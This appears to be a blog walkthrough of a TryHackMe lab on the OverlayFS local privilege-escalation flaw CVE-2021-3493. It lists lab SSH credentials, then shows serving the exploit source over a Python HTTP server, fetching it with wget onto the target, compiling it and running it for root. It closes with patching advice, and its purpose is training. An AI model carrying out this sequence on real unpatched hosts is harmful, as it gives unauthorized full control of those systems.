# Understand OverlayFS Vulnerability (CVE-2021-3493) in TryHackMe Room

## Introduction

In this guide, you will learn how to exploit OverlayFS vulnerabilities for Linux privilege escalation. OverlayFS combines multiple file systems but can pose security risks if mishandled. A specific vulnerability lets attackers gain root access with a crafted binary. You'll set up a machine, use SSH with provided credentials, and compile an exploit to achieve root privileges and capture a flag, enhancing your hands-on cybersecurity skills.

## **Understanding the Threat**

OverlayFS is a kernel module designed to create virtual file systems that combine multiple underlying file systems. While it offers performance benefits and flexibility, it also introduces potential security risks if not properly implemented or maintained.

The vulnerability highlighted by SSD-Disclosure exploits a flaw in OverlayFS's handling of certain file operations. By running a specially crafted binary, an attacker can trick the kernel into giving them root privileges. This attack is particularly concerning because it doesn't require any specific software or tools to be present on the target system. Even without a C compiler, attackers can compile the malicious binary on another machine and transfer it to the vulnerable server.

### **Credentials for SSH**

for this lab, we will use the following credentials:

`Username: overlay`

`Password: tryhackme123`

`Ip address for machine: 10.10.31.254`

firstly we are going to deploy our machine and log in using SSH:

For SSH we will use the following command: `ssh overlay@10.10.31.254`

after login in we were able to gain access to the machine:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1729076034513/0fd60587-7a16-4bba-88df-107667145206.png align="center")

Grab the source code for the exploit from [here](https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/) and save it as exploit.c on the target machine.

to do this, we can use the `nano exploit.c` command and copy the code to the exploit.c file.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1729076679663/53988e53-af1f-4b43-aa1d-8a2f3a2cdc62.png align="center")

to save the created file to the target machine we will create a local server using the command `python3 -m http.server 8000`:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1729077010422/a9ccbc21-f9f9-4c5c-b0d0-27772768afab.png align="center")

on the target machine, we will grab the exploit.c file using the following command.

`wget` [`http://10.9.1.112:8000/`](http://10.10.14.1:8000/linpeas.sh)`exploit.c` here, **10.9.1.112** is my local address.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1729078043620/bbbe028b-9fff-459a-8582-2c61d684fe58.png align="center")

next, we are going to convert the exploit source code into an executable file using the following command: `gcc -o exploit exploit.c` exploit is the executable file while the exploit.c is the source code file.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1729078613555/eb4d6435-3427-4817-8e8a-6a02796cca6a.png align="left")

The next step is to run the compiled exploit, and get root! command to use is `./exploit`.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1729078825334/6819ce1d-e3c0-4f9c-94d5-d72a0ab780ea.png align="left")

The final challenge is to locate and capture the flag which is located in the **/root/** directory and use the `cat` command to read the output of the file.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1729079127479/be73aec0-a597-4ace-8c31-eecea9743e9f.png align="left")

## Conclusion

The OverlayFS vulnerability poses a significant threat to Ubuntu 18.04 Server systems, allowing attackers to gain complete control. To mitigate this risk, ensure your system is updated with the latest security patches, verify the OverlayFS module is patched, and implement additional security measures like regular updates, strong passwords, firewall protection, and data backups. By taking these proactive steps, you can significantly reduce the risk of exploitation and protect your valuable data and resources.
